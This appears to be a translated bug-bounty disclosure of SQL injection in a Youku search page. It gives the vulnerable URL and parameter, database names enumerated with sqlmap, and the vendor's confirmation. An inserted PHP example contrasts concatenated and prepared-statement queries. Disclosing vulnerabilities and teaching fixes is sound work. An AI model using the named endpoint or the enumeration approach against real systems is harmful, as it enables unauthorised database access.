2014-04-21: Details reported to the vendor, awaiting vendor processing
2014-04-21: Vendor confirmed; details disclosed to the vendor only
2014-05-01: Details disclosed to core white hats and relevant domain experts
2014-05-11: Details disclosed to regular white hats
2014-05-21: Details disclosed to intern white hats
2014-06-05: Details disclosed to the public
Two reports in a row and still no Youku VIP membership~~~ here comes the third.
The problem is on this site:
http://tide.youku.com/
Injection URL:
http://tide.youku.com/search.php?key=1&t=1
The key parameter is not filtered at all, so it is passed straight into the query and causes SQL injection.
Databases:
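An added example, not code from the original report or from Youku, showing the pattern behind this finding in PHP: the vulnerable handler concatenates `$_GET['key']` into the SQL string, the hardened one binds it through a prepared statement so the value is sent as data and never parsed as SQL. The table name `tide_videos` comes from the report's table listing; the column names and the handling of the `t` parameter are assumptions.

```php
<?php
// Assumed schema (not from the report): tide_videos(id, title, type).

// Vulnerable pattern: untrusted input spliced into the query text.
// Anything in $key that contains a quote changes the SQL grammar.
function search_vulnerable(mysqli $db, string $key, int $type)
{
    $sql = "SELECT id, title FROM tide_videos"
         . " WHERE type = " . $type
         . " AND title LIKE '%" . $key . "%'";
    return $db->query($sql);
}

// Hardened pattern: placeholders for every user-controlled value.
// The LIKE wildcards are built on the database side with CONCAT so the
// bound string is treated purely as a literal.
function search_safe(mysqli $db, string $key, int $type): array
{
    $stmt = $db->prepare(
        "SELECT id, title FROM tide_videos"
        . " WHERE type = ? AND title LIKE CONCAT('%', ?, '%')"
    );
    // Escape LIKE metacharacters so a user cannot widen the match;
    // this is a usability fix, the injection is already closed by binding.
    $escaped = addcslashes($key, '%_\\');
    $stmt->bind_param('is', $type, $escaped);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// Request handling as search.php would do it (assumed wiring).
$db   = new mysqli('localhost', 'app', 'secret', '2013_gz');
$key  = isset($_GET['key']) ? (string) $_GET['key'] : '';
$type = isset($_GET['t']) ? (int) $_GET['t'] : 0;   // cast closes the second injection point
foreach (search_safe($db, $key, $type) as $row) {
    echo htmlspecialchars($row['title'], ENT_QUOTES, 'UTF-8'), "\n";
}
```

Casting `t` to an integer and binding `key` as a string removes both injection points; `mysqli_real_escape_string` alone would not protect the numeric `t` parameter, which is why binding is preferred.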
available databases [3]:
[*] 2013_gz
[*] information_schema
[*] test
Current database: 2013_gz (106 tables listed in the sqlmap output; the dump of table names is omitted here).
This was only a test, so I stopped here.
You know how it is~~
Severity: High
Vulnerability Rank: 20
Confirmed at: 2014-04-21 14:30
Thanks for the heads-up, we will fix it right away.
None for now.